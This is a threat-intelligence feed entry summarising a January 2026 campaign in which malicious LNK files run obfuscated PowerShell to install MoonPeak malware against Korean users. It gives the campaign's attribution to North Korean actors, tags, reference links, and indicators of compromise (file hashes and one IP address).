Malware MoonPeak Executed via LNK Files

Jan. 26, 2026, 6:03 p.m.

Description

In January 2026, IIJ observed malicious LNK files targeting Korean users to execute the MoonPeak malware, attributed to North Korean threat actors. The infection chain begins with a LNK file that runs an obfuscated PowerShell script, which checks for analysis environments, creates additional scripts, and sets up persistence. The second stage downloads and executes a payload from GitHub, which is actually the MoonPeak malware. MoonPeak is obfuscated using ConfuserEx and communicates with a C2 server. The campaign utilizes GitHub for hosting malware, a technique known as Living Off Trusted Sites (LOTS). This attack demonstrates the ongoing threat posed by North Korean actors targeting various countries and individuals worldwide.

External References

https://sect.iij.ad.jp/blog/2026/01/dprk-moonpeak-executed-via-malicious-lnk-file
https://otx.alienvault.com/pulse/69777a203745e70e7425106f
Tags
powershell
persistence
korea
xenorat
github
moonpeak
lnk files
confuserex
2026-01-26
lots

Date

  • Created: Jan. 26, 2026, 2:28 p.m.
  • Published: Jan. 26, 2026, 2:28 p.m.
  • Modified: Jan. 26, 2026, 6:03 p.m.

Indicators

  • 8de36cb635eb87c1aa0e8219f1d8bf2bb44cad75b58ef421de77dd1aae669bf4
  • aaac6eadac6c325bfc69b561d75f7cfd979ac289de1cc4430c5cc9a9a655b279
  • 1553bfac012b20a39822c5f2ef3a7bd97f52bb94ae631ac1178003b7d42e7b7f
  • 27.102.137.88
Download all indicators here!

Attack Patterns

  • XenoRAT
  • MoonPeak
  • North Korea (DPRK)

Additional Informations

  • Finance